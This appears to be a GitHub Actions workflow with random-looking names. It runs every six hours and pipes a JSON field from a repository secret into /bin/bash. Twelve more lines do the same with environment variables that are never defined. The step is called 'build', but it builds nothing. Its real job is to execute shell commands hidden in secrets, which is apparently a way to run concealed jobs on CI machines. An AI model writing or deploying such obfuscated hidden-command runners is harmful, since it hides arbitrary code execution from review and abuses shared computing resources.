name: laoqiuling8311

on:
  workflow_dispatch:
  schedule:
    - cron: '28 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: laoqiuling8311
        env:
          c8: ${{ secrets.c8 }}
        run: |
          echo $c8 | jq -r .roi61 | /bin/bash
          echo $km4069 | jq -r .xxwav2411 | /bin/bash
          echo $ybhn9939 | jq -r .zfkap5980 | /bin/bash
          echo $cgxet92 | jq -r .scxr4 | /bin/bash
          echo $d8 | jq -r .hywhx382 | /bin/bash
          echo $mqcm7586 | jq -r .voahj1125 | /bin/bash
          echo $fp008 | jq -r .vbca707 | /bin/bash
          echo $zolgu9 | jq -r .n40 | /bin/bash
          echo $hyr879 | jq -r .h7 | /bin/bash
          echo $t5 | jq -r .hi06651 | /bin/bash
          echo $hrm4246 | jq -r .egk2 | /bin/bash
          echo $qj708 | jq -r .vc00539 | /bin/bash
          echo $vtu190 | jq -r .ugsu14 | /bin/bash

